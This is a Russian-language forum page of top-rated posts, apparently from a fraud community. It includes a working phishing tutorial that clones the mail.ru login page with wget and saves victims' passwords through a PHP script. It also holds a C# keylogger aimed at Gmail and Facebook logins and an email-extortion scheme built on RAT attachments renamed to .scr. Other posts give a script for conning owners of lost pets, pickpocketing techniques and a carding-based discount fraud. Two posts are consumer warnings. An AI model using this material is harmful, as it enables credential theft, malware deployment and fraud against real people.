Таблица лидеров
-
в Сообщения
- Все области
- Adverts
- Advert Questions
- Advert Reviews
- Файлы
- Комментарии к файлам
- Отзывы к файлам
- Записи блога
- Комментарии блога
- Изображения
- Комментарии к изображениям
- Отзывы к изображению
- Альбомы
- Комментарии к альбому
- Отзывы к альбому
- События
- Комментарии к событиям
- Отзывы к событиям
- Сообщения
- Статусы
- Ответы на статус
-
Пользовательская дата
-
Всё время
9 октября 2021 - 11 сентября 2025
-
Год
11 сентября 2024 - 11 сентября 2025
-
Месяц
11 августа 2025 - 11 сентября 2025
-
Неделя
4 сентября 2025 - 11 сентября 2025
-
Сегодня
11 сентября 2025
-
Пользовательская дата
11.08.2022 - 11.08.2022
-
Всё время
Популярные публикации
Отображаются публикации с наибольшей репутацией на 11.08.2022 в Сообщения
-
1 балл
-
1 балл
-
1 баллВ данный момент времени куда не плюнь, кругом одни фирмы. Можем составить небольшой список того, что есть практически в любом городе. Это огромный выбор: - Кухни на заказ. - Сантехника (крупные магазины). - Огромные торговые площадки всяким дерьмом. - Мебель, которой можно обосраться. - Автозапчасти. - Пиломатериалы. Список сможете продолжить сами, мне просто лень. Выйдете на улицу и всё сами увидите Смысл чёрной схемы очень простой, у каждой такой организации есть сайт. Тухлый, захудалый, но сайт есть. На сайтах контактная информация и как правило email ящик. Наверняка доводилось видеть, как при заказе чего-то в таких магазинах можно увидеть открытый почтовый ящик на ПК менеджера или руководителя. Смысл чёрной схемы состоит в том, что email ящики данных организаций взламывают и требуют выкуп иначе все данные будут слиты в сеть. Кто-то удаляет всю почту из почтового ящика, а за восстановление просит деньги(почту предварительно клонируют на другой ящик). Многие идут ещё дальше, устанавливают крипто-локер (Windows-Locker), который шифрует файлы на ПК и требует денежку за разблокировку в совокупности с поломанной почтой. Когда менеджер видит такой пиздец, в особенности девушка. Начинается паника и платят. Всё конечно зависит от конкретного случая, но как правило цена около 4000-5000р за разблокировку. P.S. Ещё не забывают пугать, мол вообще пиздц устроим. Чтобы выбить денег. И Самая главная плюшка, взломать ящик практически не составляет труда. Делают очень заманчивый ход. На почту присылают письмо, якобы с прикреплением. А текст вида, что” мол правки по нашему заказу. Мы были у Вас недавно” …, всё конечно зависит от конкретного случая и уровнем владения СИ (надеюсь не надо рассказывать, что обозначают эти 2 заглавные буквы). В качестве прикрепления выступает файл с расширением .SCR, для тех, кто не знает! Если программу переименовать из вида load.exe в load.scr – то она без проблем запустится как исполняемый файл. Более подробно можете почитать в google Куда там знать офисным клеркам о таких фишках, которые со времени моих грязных подгузников использую в сети. Файлик скачивают, запускают… и там уже полный rat доступ над ПК. Делай чего хочешь. Кто-то скажет, да там антивирус!!! А что мешает злоумышленникам крутануть трой? На том же scan4you можно найти в рекламе, людей которые представляют такие услуги… или в гугле. В двух словах можно описать эту схему так: Мошенники находят себе жертву и как правило не одну. С помощью СИ и хорошо замаскированного письма впаривают троян. Использую уловки, что данное письмо от заказчика их услуг. Хотя бывает и такое, что просто присылают якобы обновление для их программы. После запуска троя. Хакер уже смотрит, как он может монетизировать ПК. Иногда бывает, что шантажируют сливом БД заказчиков услуг. Вы должны понимать – простой шантаж человека, с целью получить выкуп. Доход по такой схеме очень высокий, почему? Ответите сами. Тема может и стара, но актуальности не потеряла.
-
1 балл
-
1 баллКлассический прием — толкание Один карманник как бы нечаянно врезается в жертву, а второй, так же «нечаянно» проходя мимо, вытаскивает кошелек из сумки или кармана жертвы. Иногда толкающий и проходящий разыгрывают прилюдную ссору, чтобы совсем уж отвлечь своего «клиента» и рассеять его внимание. Прием с наушниками Люди в наушниках — идеальная жертва, так как они уже отвлечены на музыку. Легче всего позаимствовать их телефон: воры тихонечко вытаскивают провод наушников из телефона и ловко забирают последний. Меломан не сразу понимает, что произошло: первым делом он смотрит наушники, думая, что проблема в них. А лишь через некоторое время понимает, что случилось. Особенно такой способ любят применять возле турникетов в метро: когда человек сосредотачивается на поиске в сумке жетонов, проездных и т. п. Дерзкие приемы в метро Если вы успели забежать в вагон метро последним и встать у двери в час пик — держите свои вещи крепче: существует такой подвид мошенников, как «дерзкие карманники», которые подбегают к дверям вагона за пару секунд до их закрытия и совершенно открыто и честно вырывают вещи у людей. Прежде чем человек успеет осознать, что произошло, двери уже закроются. Если в час пик в транспорте вас отчаянно притесняет какой-нибудь непонятный мужик, ни в коем случае не поворачивайтесь к нему спиной! Он только и толкает вас ради того, чтобы вы повернулись лицом в сторону других, а карманами и сумкой — к нему. При этом он может сам выглядеть жертвой натиска толпы, либо казаться совершенно неподозрительным (например, что-то усердно читающим с телефоном в руках). Ресторанные приемы Если вы вешаете свои вещи на спинку стула, вы даете простор для фантазии карманников — им достаточно лишь отвлечь ваше внимание, например разыграть скандал за соседним столом: пока вы будете наслаждаться просмотром шоу, их подельник просто соберет ваши вещи. Если вы вешаете верхнюю одежду на общую вешалку, то содержимое ваших карманов может забрать хозяин соседнего пальто, который просто якобы ищет сигареты в своих карманах. Если компания зашла в кафе, но почему-то все разбрелись и сели по отдельности, да еще и разговаривают по телефону, ждите шоу — они вычисляют жертву. Обман с картой города В туристических местах воры часто притворяются туристами: они просят людей помочь им определить собственное местоположение, показывая карту, и пока жертва совершенно искренне пытается помочь, псевдотурист незаметно вытаскивает что-либо из ее сумки или кармана. Отличительный признак: такие преступники пихают карту жертве как можно ближе к лицу. Кража и использование кредитных карт Если вы думаете, что без ПИН-кода кража банковской карты слегка несуразна, вы ошибаетесь. Во многих магазинах можно попросить пробить товар без введения кода, например вместо ПИН-кода показать паспорт с именем владельца, подделать который не так трудно. К тому же некоторые онлайн-сервисы не отправляют проверочный код на телефон, что позволяет беспрепятственно совершать покупки с любой карты. Прием «испачкай прохожего» Сцена с данным трюком разыгрывается в основном у банкоматов. Карманник «нечаянно» проливает кофе, роняет мороженое или размазывает кетчуп от хот-дога на жертву, которая — так уж совпало — только что сняла деньги в банкомате. Далее следует сцена бурных извинений и помощь в очистке одежды, в том числе и карманов. Занавес. Аплодисменты. «Розыгрыш» детишек Это представление исполняется ребенком либо группой детей. Со всеми атрибутами попрошаек дети бегают в кафе, меж толпы с табличками о помощи. Пока вы жалеете милых бедных деток и ищете для них мелочь, эти юные дельцы обчищают ваши столы и карманы. Чаще всего на эту уловку попадаются туристы за границей. Прием с цветами Вам когда-нибудь за границей пытался впарить цветок какой-то бомж? Знайте: он не всегда хочет деньги лишь за цветок. Даже если он вас слезно умоляет, жмет руки, обнимает, не берите этот цветок! Он просто пытается вас отвлечь и обчистить в это время ваши карманы, снять часы и т. д. Благотворительность Иногда можно встретить активистов, которые собирают подписи в поддержку какого-либо законопроекта или деньги на благотворительность. Пока отозвавшиеся прохожие читают или подписывают буклеты, один из активистов собирает их ценные вещи. Розыгрыш веселых людей Этот прием «отрабатывают» на людях, которые в данный момент испытывают алкогольную эйфорию. Обычно действие происходит в барах. Какой-нибудь шутник, он же очень веселый вор, может предложить жертве на спор определить ее вес, приподняв ее на руках. Обнимая при этом жертву, преступник вытаскивает кошелек или мобильный телефон. Кажется тупым розыгрышем, правда? Но подшофе вы сами сочли бы это гениальным. Услуги носильщика В эту криминальную уловку попадают в основном пожилые люди: вор предлагает помочь донести тяжелые сумки до квартиры, берет их и мчит по лестнице вверх, проверяя по пути наличие кошелька в сумках. Прием в супермаркете Если вы тот человек, что любит повесить свою сумку или рюкзак на ручку тележки для покупок, то вы можете стать жертвой магазинных воришек. Представители этого подвида карманников обычно сердечно просят помочь найти ему какой-то определенный товар. Пока вы пытаетесь помочь, направив все мысли на предмет поиска, из вашей сумки как бы невзначай может что-то исчезнуть, что вы обнаружите лишь у кассы
-
1 балл
-
1 балл
-
1 балл
-
1 баллХакерский мир можно условно разделить на три группы атакующих: 1) «Skids» (script kiddies) – малыши, начинающие хакеры, которые собирают известные куски кода и утилиты и используя их создают какое-то простое вредоносное ПО. 2) «Byuers» — не чистые на руку предприниматели, тинэйджеры и прочие любители острых ощущений. Покупают услуги по написанию такого ПО в интернете, собирают с ее помощью различную приватную информацию, и, возможно, перепродают ее. 3) «Black Hat Сoders» — гуру программирования и знатоки архитектур. Пишут код в блокноте и разрабатывают новые эксплоиты с нуля. Может ли кто-то с хорошими навыками в программировании стать последним? Не думаю, что вы начнете создавать что-то, на подобии regin (ссылка) после посещения нескольких сессий DEFCON. С другой стороны, я считаю, что сотрудник ИБ должен освоить некоторые концепты, на которых строится вредоносное ПО. Зачем ИБ-персоналу эти сомнительные навыки? Знай своего врага. Как мы уже обсуждали в блоге Inside Out, нужно думать как нарушитель, чтобы его остановить. Я – специалист по информационной безопасности в Varonis и по моему опыту – вы будете сильнее в этом ремесле если будете понимать, какие ходы будет делать нарушитель. Поэтому я решил начать серию постов о деталях, которые лежат в основе вредоносного ПО и различных семействах хакерских утилит. После того, как вы поймете насколько просто создать не детектируемое ПО, вы, возможно, захотите пересмотреть политики безопасности на вашем предприятии. Теперь более подробно. Для этого неформального класса «hacking 101» вам необходимы небольшие знания в программировании (С# и java) и базовое понимание архитектуры Windows. Имейте ввиду, что в реальности вредоносное ПО пишется на C/C++/Delphi, чтобы не зависеть от фреймфорков. Кейлогер Кейлогер – это ПО или некое физическое устройство, которое может перехватывать и запоминать нажатия клавиш на скомпрометированной машине. Это можно представить как цифровую ловушку для каждого нажатия на клавиши клавиатуры. Зачастую эту функцию внедряют в другое, более сложное ПО, например, троянов (Remote Access Trojans RATS), которые обеспечивают доставку перехваченных данных обратно, к атакующему. Также существуют аппаратные кейлогеры, но они менее распространены, т.к. требуют непосредственного физического доступа к машине. Тем не менее создать базовые функции кейлогера достаточно легко запрограммировать. ПРЕДУПРЕЖДЕНИЕ. Если вы хотите попробовать что-то из ниже следующего, убедитесь, что у вас есть разрешения, и вы не несёте вреда существующей среде, а лучше всего делать это все на изолированной ВМ. Далее, данный код не будет оптимизирован, я всего лишь покажу вам строки кода, которые могут выполнить поставленную задачу, это не самый элегантный или оптимальный путь. Ну и наконец, я не буду рассказывать как сделать кейлогер стойким к перезагрузкам или пытаться сделать его абсолютно не обнаружимым благодаря особым техникам программирования, так же как и о защите от удаления, даже если его обнаружили. Начнем. Для подключения к клавиатуре вам всего лишь нужно использовать 2 строки на C#: 1. [DllImport("user32.dll")] 2. 3. public static extern int GetAsyncKeyState(Int32 i); Вы можете изучить больше про фунцию GetAsyncKeyState на MSDN: Для понимания: эта функция определяет нажата клавиш или отжата в момент вызова и была ли нажата после предыдущего вызова. Теперь постоянно вызываем эту функцию, чтобы получать данные с клавиатуры: 1. while (true) 2. { 3. Thread.Sleep(100); 4. for (Int32 i = 0; i < 255; i++) 5. { 6. int state = GetAsyncKeyState(i); 7. if (state == 1 || state == -32767) 8. { 9. Console.WriteLine((Keys)i); 10. 11. } 12. } 13. } Что здесь происходит? Этот цикл будет опрашивать каждые 100 мс каждую из клавиш для определения ее состояния. Если одна из них нажата (или была нажата), сообщение об этом будет выведено на консоль. В реальной жизни эти данные буферизируются и отправляются злоумышленнику. Умный кейлогер Погодите, а есть ли смысл пытаться снимать всю подряд информацию со всех приложений? Код выше тянет сырой ввод с клавиатуры с любого окна и поля ввода, на котором сейчас фокус. Если ваша цель – номера кредитных карт и пароли, то такой подход не очень эффективен. Для сценариев из реального мира, когда такие кейлогеры выполняются на сотнях или тысячах машин, последующий парсинг данных может стать очень долгим и по итогу потерять смысл, т.к. ценная для взломщика информация может к тому времени устареть. Давайте предположим, что я хочу заполучить учетные данные Facebook или Gmail для последующей продажи лайков. Тогда новая идея – активировать кейлоггинг только тогда, когда активно окно браузера и в заголовке страницы есть слово Gmail или facebook. Используя такой метод я увеличиваю шансы получения учетных данных. Вторая версия кода: 1. while (true) 2. { 3. IntPtr handle = GetForegroundWindow(); 4. if (GetWindowText(handle, buff, chars) > 0) 5. { 6. string line = buff.ToString(); 7. if (line.Contains("Gmail")|| line.Contains("Facebook - Log In or Sign Up ")) 8. { 9. //проверка клавиатуры 10. } 11. } 12. Thread.Sleep(100); 13. } Этот фрагмент будет выявлять активное окно каждые 100мс. Делается это с помощью функции GetForegroundWindow (больше информации на MSDN). Заголовок страницы хранится в переменной buff, если в ней содержится gmail или facebook, то вызывается фрагмент сканирования клавиатуры. Этим мы обеспечили сканирование клавиатуры только когда открыто окно браузера на сайтах facebook и gmail. Еще более умный кейлогер Давайте предположим, что злоумышленник смог получить данные кодом, на подобии нашего. Так же предположим, что он достаточно амбициозен и смог заразить десятки или сотни тысяч машин. Результат: огромный файл с гигабайтами текста, в которых нужную информацию еще нужно найти. Самое время познакомиться с регулярными выражениями или regex. Это что-то на подобии мини языка для составления неких шаблонов и сканирования текста на соответствие заданным шаблонам. Вы можете узнать больше здесь. Для упрощения, я сразу приведу готовые выражения, которые соответствуют именам логина и паролям: 1. //Ищем почтовый адрес 2. ^[\w!#$%&'*+\-/=?\^_`{|}~]+(\.[\w!#$%&'*+\-/=?\^_`{|}~]+)*@((([\-\w]+\.)+[a-zA-Z]{2,4})|(([0-9]{1,3}\.){3}[0-9]{1,3}))$ 3. 4. 5. //Ищем пароль 6. (?=^.{6,}$)(?=.*\d)(?=.*[a-zA-Z]) Эти выражения здесь как подсказка тому, что можно сделать используя их. С помощью регулярных выражений можно искать (т найти!) любые конструкции, которые имеют определенный и неизменный формат, например, номера паспортов, кредитных карт, учетные записи и даже пароли. Действительно, регулярные выражения не самый читаемый вид кода, но они одни из лучших друзей программиста, если есть задачи парсинга текста. В языках Java, C#, JavaScript и других популярных уже есть готовые функции, в которые вы можете передать обычные регулярные выражения. Для C# это выглядит так: 1. Regex re = new Regex(@"^[\w!#$%&'*+\-/=?\^_`{|}~]+(\.[\w!#$%&'*+\-/=?\^_`{|}~]+)*@((([\-\w]+\.)+[a-zA-Z]{2,4})|(([0-9]{1,3}\.){3}[0-9]{1,3}))$"); 2. Regex re2 = new Regex(@"(?=^.{6,}$)(?=.*\d)(?=.*[a-zA-Z])"); 3. string email = "Oded.awask@gmail.com"; 4. string pass = "abcde3FG"; 5. Match result = re.Match(email); 6. Match result2 = re2.Match(pass); Где первое выражение (re) будет соответствовать любой электронной почте, а второе (re2) любой цифро буквенной конструкции больше 6 символов. Бесплатно и полностью не обнаружим В своем примере я использовал Visual Studio – вы можете использовать свое любимое окружение – для создания такого кейлогера за 30 минут. Если бы я был реальным злоумышленником, то я бы целился на какую-то реальную цель (банковские сайты, соцсети, тп) и видоизменил код для соответствия этим целям. Конечно, также, я запустил бы фишинговую кампанию с электронными письмами с нашей программой, под видом обычного счета или другого вложения. Остался один вопрос: действительно такое ПО будет не обнаруживаемым для защитных программ? Я скомпилировал мой код и проверил exe файл на сайте Virustotal. Это веб-инструмент, который вычисляет хеш файла, который вы загрузили и ищет его в базе данных известных вирусов. Сюрприз! Естественно ничего не нашлось. В этом основная фишка! Вы всегда можете менять код и развиваться, будучи всегда на несколько шагов раньше сканеров угроз. Если вы в состоянии написать свой собственный код он почти гарантированно будет не обнаружим. На этой странице вы можете ознакомиться с полным анализом.
-
1 балл
-
1 баллВ середине лета 2016 года в Telegram'е начали появляться специальные каналы и боты, предлагающие необычайно высокие скидки на повседневные услуги, включая поездки на такси, заказ еды в ресторанах и бронирование отелей. Пример тому — сервисы SaleMaster и Easylife, хотя подобных ботов гораздо больше. «Скидочные» боты работают по одной и той же схеме. Сначала пользователь видит категорию доступных услуг и выбирает интересующую его опцию. Затем бот демонстрирует ему набор поставщиков скидок и отзывы к ним, чтобы он убедился, что эта система действительно работает. Далее пользователь выбирает услугу и ведет общение непосредственно с продавцом на его канале. Сделка с поставщиком выглядит так: пользователь перечисляет продавцу деньги через платежный сервис PayPal, а взамен получает выбранную услугу — доставку еды или поездку на такси. Обычно продавец услуги курирует поездки и покупки клиента от начала до конца, сопровождая весь процесс сообщениями в мессенджере. Таким образом, у покупателя складывается впечатление, что сервис абсолютно легален и связан партнерскими отношениями с поставщиком услуги (например, Uber или «Яндекс.Такси»). По завершении сделки клиент может оставить отзыв о поставщике на специальном форуме или в рамках функционала бота. В сервисе EasyLife, например, одних только поставщиков такси не менее 15. Поездки делятся на длинные и короткие, при этом скидки на первые куда более заманчивы: двухчасовая поездка на автомобиле BMW пятой серии или другой машине премиального класса обойдется всего в 700 руб. против 3 тыс. руб. у Uber, то есть на 76% дешевле. На короткие поездки скидка составляет около 60%. Помимо такси в боте также можно найти скидки на доставку цветов, заказ еды и покупку билетов в кино. В среднем дисконт составляет от 40 до 75%. Аналогичные предложения с сопоставимым диапазоном скидок доступны и в сервисе SaleMaster. Столь выгодные предложения в Telegram'е стали возможны благодаря махинациям c украденными картами и промокодами. У клиента, обратившегося за услугами таких поставщиков, нет никаких гарантий, кроме репутации продавца, которую очень легко потерять из-за плохого сервиса. Обман с дисконтом Львиная доля всех суперскидок в Telegram объясняется отмыванием денег с украденных карт и электронных кошельков. Ворованные данные карт и кошельков оптом скупаются у перекупщиков из «даркнета». Карты обязательно должны быть выпущены в России. Чтобы обналичить деньги, не подставив себя, теневые предприниматели покупают товары и услуги за полную стоимость, а затем продают их клиентам в Telegram с большим дисконтом. Таким образом махинаторам удается обналичить лишь часть суммы с украденной карты, но зато они остаются вне поля зрения правоохранительных органов. Ведь отследить связь между пополнением кошелька PayPal и вызовом такси практически невозможно. Впрочем, владельцы каналов со скидками предпочитают покупать при помощи этой схемы товары из премиального ценового сегмента — например, дорогостоящую мебель и поездки на люксовых автомобилях. Это позволяет продавцам получить максимальную прибыль. О существовании таких перекупщиков клиенты чаще всего узнают благодаря сарафанному радио, то есть от других пользователей. Однако раньше для привлечения покупателей использовались СМС-рассылки. Недостатка в клиентуре у махинаторов нет. Карточный бум Эта схема стала следствием большого количества краж банковских карт и данных электронных кошельков при помощи специальных вирусов. Особую опасность представляют собой вредоносные программы, разработанные для мобильной платформы Android. С помощью поддельных веб-сайтов и окон, маскирующихся под магазин приложений Google Play и сайты российских банков, хакеры воруют карточные данные пользователей. Деньги перечисляются через сервисы перевода средств по СМС. Этот вид мошенничества называется фишингом. Ситуация усугубляется тем, что методов сокрытия воровства от пользователя становится все больше. Сейчас вирусы научились блокировать СМС о списании денег у пользователя и перенаправлять коды подтверждения транзакции злоумышленникам. «С помощью отправки кодов на короткие номера можно переводить до 30 тыс. руб. в день. Пользователей iPhone риски тоже не обходят стороной: проведение операции Jailbreak, позволяющей пользователю получить абсолютный контроль над файловой системой телефона, делает смартфон уязвимым для вирусов и фишинговых программ. Бизнес на купонах Помимо украденных карт поставщики скидок собирают и активируют промокоды. На эту схему приходится меньшая часть рынка суперскидок. Теневые предприниматели скупают оптом купоны со скидками, а также покупают в «даркнете» чужие банковские и сим-карты, зачастую оформленные на третье лицо без его ведома. При помощи этих карт они активируют промоакции по купонам, позволяющие новичкам получать скидки на товары и услуги, и продают их в Telegram. Эта схема, впрочем, требует постоянной докупки новых банковских и сим-карт. В основном скупщики купонов предлагают клиентам в Telegram короткие поездки на такси и доставку еды. Для этого они просто заказывают услугу у оператора, используя свой промокод, и указывают адрес заказчика. В особом почете у мошенников такси-сервис Uber — якобы из-за возможности использовать для него промокупоны других стран. В чем опасность Пострадать в этом могут не только те у которых украли данный банковских карт и электронных кошельков, но и покупатели услуг в Telegram. Пользователи Telegram, которые продают товары, купленные на украденные карты, могут быть привлечены к мошенничеству в сфере компьютерной информации. При этом покупатели приобретающие эти услуги и товары, могут быть признаны соучастниками.
-
1 баллПокупка Кирби: как разводят на пылесосах от клещей Привыкли, что обычно бытовую технику вы покупаете сами в специализированных магазинах? С пылесосом Kirby все совсем иначе. Продавцы сами придут к вам на дом, проведут демонстрацию, расскажут все подробно о нем и… уговорят вас купить его. За 150 тыс. рублей, а то и дороже. Продается он только при личном контакте, на этом и строится вся схема развода. В магазинах его не купить, только у представителей, которые с радостью его вам продадут. Вам кажется, что невозможно уговорить человека приобрести какой-то там пылесос аж за 150 тыс. рублей? Огорчу, вам это только кажется. И вы тоже можете так пострадать, причем даже не поймете, как вас заставили подписать договор. Например, как Мария Божко из глубинки, которая не просто купила Кирби, а еще и взяла кредит на него в размере почти 200 тыс. рублей и не знает, как его выплачивать, учитывая невысокую зарплату в сельской местности. Этот развод действует уже более 10 лет на территории РФ, тем не менее, актуальности он не теряет, а количество пострадавших только увеличивается. Схема развода Вот, по какой схеме строятся продажи и каким образом продавцы пылесосов Кирби разводят своих жертв: Милые молодые люди-продавцы, сразу стучатся к вам в дверь либо же предварительно звонят вам по телефону, договариваясь о встрече. Зачем? Чтобы продемонстрировать инновационную технику – пылесос Kirby, отлично вычищающий любые загрязнения. Это лишь демонстрация, и вы ничего не обязаны, зато вам бесплатно все почистят ковер к примеру. Почему бы и не согласится? Вот а дальше начинается цирк… Вам начинают показывать аппарат, сколько к нему различных насадок идет, рассказывать про невероятные характеристики, ручную сборку, мегамощный двигатель. После чего приступают к демонстрации, не забывая говорить о том, как он отлично всасывает любую грязь, а также клещей и прочих паразитов, которых, как выясняется, просто тьма-тьмущая у вас. Вам обязательно расскажут о том, как клещи живут в каждом доме и как пагубно влияют на здоровье людей, а для большей убедительности покажут изображения этих тварей в увеличенном виде. И только пылесос Кирби способен всасывать их и очищать жилое пространство от этих паразитов! Простые пылесосы с таким не справятся, что вы… Напоследок, вам сообщат о стоимости, которая составляет в среднем 150-200 тыс. рублей в зависимости от жадности распространителя, и предложат заполнить анкету, якобы для отчета руководству. Понравилось? Понравилось. Хотели бы иметь его дома? Хотели. Готовы ли вы платить за свое здоровье? Готовы. Смогли бы оплатить наличными или безналом? Нет? А может в рассрочку или кредит? Сколько можете внести как первый платеж и платить каждый месяц? Вот так ненавязчиво вас уже начнут обрабатывать и аккуратно подводить к покупке, делая упор на наличие клещей в квартире, от которых надо избавиться, и заботу о своем здоровье. А если у вас еще есть дети… Напор на вас усилится многократно. Как так, вы не заботитесь о здоровье своего малыша? Хотите, чтобы у него началась аллергия? Позволяете, чтобы он спал на постели, в которой водятся паразиты? Что вы за черствые родители… Не дожидаясь вашего согласия, продавец сразу же начнет звонить своему руководству и якобы выбивать для вас персональную скидку и возможность приобрести пылесос в кредит. Только для вас он так старается! Уже и отказывать неудобно, и картинки с клещами покоя не дают. Вот так, незаметно для себя, многие подписываются на эту аферу – пылесос по цене бюджетной машины, да еще и в кредит. Кроме того, распространители этих агрегатов еще выманивают телефоны друзей жертвы под видом «Вам ведь понравился пылесос? Сделайте благое дело, пусть они тоже живут в чистоте и без клещей». Соответствует ли цена качеству? Когда тебе что-то «втюхивают», да еще и по высокой цене, уже не очень-то приятно. И ладно, если бы товар действительно соответствовал своей нереальной стоимости и перечисленным продавцом характеристикам… Однако в случае с пылесосом Кирби все обстоит совсем иначе. По цене 150-200 тыс. рублей вы получите аппарат далеко не самого высокого качества. Неприятный запах, высокий уровень шума, плохая всасываемость, неповоротливость, огромный вес, сложность в уборке углов и возле мебели – это далеко не все его недостатки. И да, от клещей он не избавляет, как уверяют продавцы, да и с уборкой справляется не очень хорошо. Вот какими негативными впечатлениями о нем делятся покупатели: Часть недостатков объясняется тем, что редко кто из покупателей получает новый пылесос. Большинству оставляют тот вариант, с которым приехали на демонстрацию. И никому не известно, на скольких квартирах он уже успел побывать… А каждая демонстрация — это износ деталей, возникновение неисправностей, загрязнение фильтров. Часть же своих функций, например, избавление от клещей, он не выполняет изначально. Так что, невероятно завышенная цена – единственная примечательность пылесосов Kirby. Причем, основную часть стоимости аппарата составляют затраты на содержание распространителей и оплату их труда, который оплачивается в размере от 6 до 10 тыс. рублей с каждой продажи. Вы без проблем можете купить пылесос с такими же или даже лучшими характеристиками по цене 5-10 тыс. рублей в магазинах техники, что в разы дешевле этого «чуда» за 150 тыс. рублей. Пылесос от клещей Кирби – это лишь очередной лохотрон, несущий вам огромные растраты. Лучший способ не попасться на него – не открывать дверь продавцам. Однако если все же открыли, то не ведитесь на их демонстрацию, громкие слова о заботе о вашем здоровье и клещах повсюду, выбитых скидках от начальника персонально для вас. Помните, что их задача – продать вам этот агрегат и заработать деньги, но уж никак не обеспечить вам чистоту в доме. Они подготовлены, умеют психологически воздействовать на жертву, используют опробованные и эффективные скрипты продаж. Чем дольше они у вас пробудут, тем меньше шансов у вас отказать им. Вы сами не заметите, как вас разведут на покупку если не единоразовой суммой, то в рассрочку или кредит. Поэтому не позволяйте им задерживаться у себя, а уверенно выпроваживайте. Возвратить им их «чудо-аппарат» и вернуть свои деньги будет очень сложно, поэтому лучше изначально не позволять им вас обрабатывать.
-
1 баллЧто то думал и надумал вот такую тему: находим на сайте olx.ua в разделе бюро находок ищи объявление о пропаже животного (там их по 5-10 в день выкладывают). К примеру находим что пропала такса. И далее есть 2 пути: 1.Берем гугулим (или по поиску картинки). Т.к. такие породы как такса, овчарки, ритриверы и тд. очень похожи между собой труда не составит найти подходящее фото. Далее смотрим откуда это объявление поступило. В моем случаи с Мариуполя. Находим близлежащие пгт\города 10 км и пишем автору что нашли, скидываем фото и говорите что привезете завтра прямо под дом т.к. все равно надо будет в город и просите на бензин : ) (Хотя последнее предложение сильно вариабельное и можно придумать что и поизощреннее. 2.Так же берем ищем только на этот пишете вот примерно таким текстом: "Как хорошо что что нашел объявление! Уже все группы вконтакте облазил! Вашу *собаку\кошку* сбила машина прямо при мне. Я на такси отвез в клинику сказали в тяжелом состоянии но не хотят оперировать т.к. надо заплатить сразу и у них к тому же все занято! Везти в другую клинку нельзя - умрет! Просят *n-к-тво* денег! А у меня с собою копейки! Скиньте на qiwi\WM\карточку тут банкомат рядом. Не хочется чтобы такое красивое животное умирало!" Но тут уже надо выбирать только с больших городов: Киев\Харьков\Львов\Одесса\Днепр т.к. могут попросить название клиники. Что в таком случаи делать: на сайте есть геотеги, то есть мы знаем из какого района города поступило объявление и ищем клинику как можно дальше от этого места. Собственно все. Уверен и русские подобные сайты есть на которых можно провернуть.
-
1 баллБабосики упали , спасибос, удачи в бизе
-
1 баллНе стал слушать вас и купил схему за 300$ меня лично все устраивает, за неделю 300 заработал, ничего по сути не делая и не умея
-
1 балл
-
1 баллФишинг - один из самых простых способов заполучить персональные данные пользователя. Суть метода заключается в том, чтобы, направив жертву на фэйковый сайт, который один в один похож на настоящий, и заставить её ввести туда свои персональные данные. Технически процесс можно разделить на два этапа: Подготовка копии сайта Нахождение способа заставить жертву перейти на фэйковый сайт. Отойдем немного к теории, фишинг это очень прибыльная тема, на самом деле тут необходимо просто продумать схему - как запутать людей и чтоб они перешли на ваш фэйковый сайт и ввели свои данные. Социальная инжерения. Сейчас я расскажу поверхностно насчет фишинга. Создание клона сайта: Вид сайта задаёт html, а интерактивные элементы на странице управляются JavaScript. Так же в коде сайта могут быть ссылки на сторонние ресурсы такие как картинки, аудиофайлы и т.п. Поэтому для создания копии не достаточно просто скопировать весь код страницы, но надо перенести так же и сторонние ресурсы или переправить ссылки на них. Помимо этого надо изменить логику работы приложения, чтобы данные отправлялись к нам на сервер и сохранялись там. Для примера попробуем создать реплику сайта страници авторизации mail. Её адрес https://account.mail.ru/login Чтобы просмотреть исходный код страницы в firefox достаточно нажать комбинацию клавиш Ctrl+U. Но нам не надо вручную всё копировать и сохранять все картинки: в linux есть более простое решение. в консоли вводим команду wget --page-requisites --convert-links https://account.mail.ru/login После этого у нас в папке, где была открыта консоль, появится папка account.mail.ru в которой будет файл login. Если открыть его в браузере, то мы увидем то же, что и на странице входа mail. Теперь надо создать сервер на котором будет храниться данная страница. Для теста создадим его локально, но процесс настройки на реальным сервере будет практически таким же. Для начала надо убедиться, что web сервер работает. Для этого надо в браузере перейти на страницу http://127.0.0.1/ Если ничего не отобразилось, надо перезапустить веб-сервер 2 командами source /etc/apache2/envvars systemctl restart apache2 После того как приветственная страница отобразилась нужно скопировать в папку сервера скачанные wget'ом файлы. Для этого переходим в /var/www/html/ и переносим туда ранее скачанный файл login. Теперь переходим в браузере по адресу login и нам отображается страница авторизации, то храниться она уже на нашем сервере. Теперь надо реализовать функцию сохранения паролей, для этого надо в текстовом редакторе открыть файл login и найти там страницу, на которую отправляются данные пользователя(за это отвечает параметр action). Для этого нажимаем ctrl+F и набираем action="https://auth.mail.ru/cgi-bin/auth" Меняем найденный текст на action="auth.php" Затем в папке с login создаём новый файл auth.php. Открываем его текстовым редактором и пишем туда <?php file_put_contents('log/login_log.txt', "Username: ".$_POST['Username']." Password: ".$_POST['Password'].'\n', FILE_APPEND); ?> file_put_contents функция для записи данных в файл, log/login_log.txt - путь к файлу. $_POST['Username'] - имя пользователя из формы, а $_POST['Password'] пароль. FILE_APPEND указывает, что файл не надо каждый раз перезаписывать, а новые данные добавляются в конец. Теперь надо создать папку, куда будут сохраняться данные. Для этого в папке в login надо в пустом месте кликнуть правой кнопкой мыши и выбрать Open in terminal. В появившимся окне вводим mkdir log chmod 777 log Всё, теперь введённый в форму логин и пароль сохраняться у нас на сервере. А чтобы жертва ничего не заподозрила перенаправим её на сайт mail с ошибкой входа. Для этого в auth.php перед ?> добавим строку и впишем туда. header('Location: https://account.mail.ru/login?fail=1'); Всё готово. Пробуем теперь зайти на http://127.0.0.1/login и ввести туда логин и пароль. Нас перенаправит на реальный сайт mail с ошибкой входа, а данные, которые ввёл пользователь, сохраняться в файле /var/www/html/log/login_log.txt
-
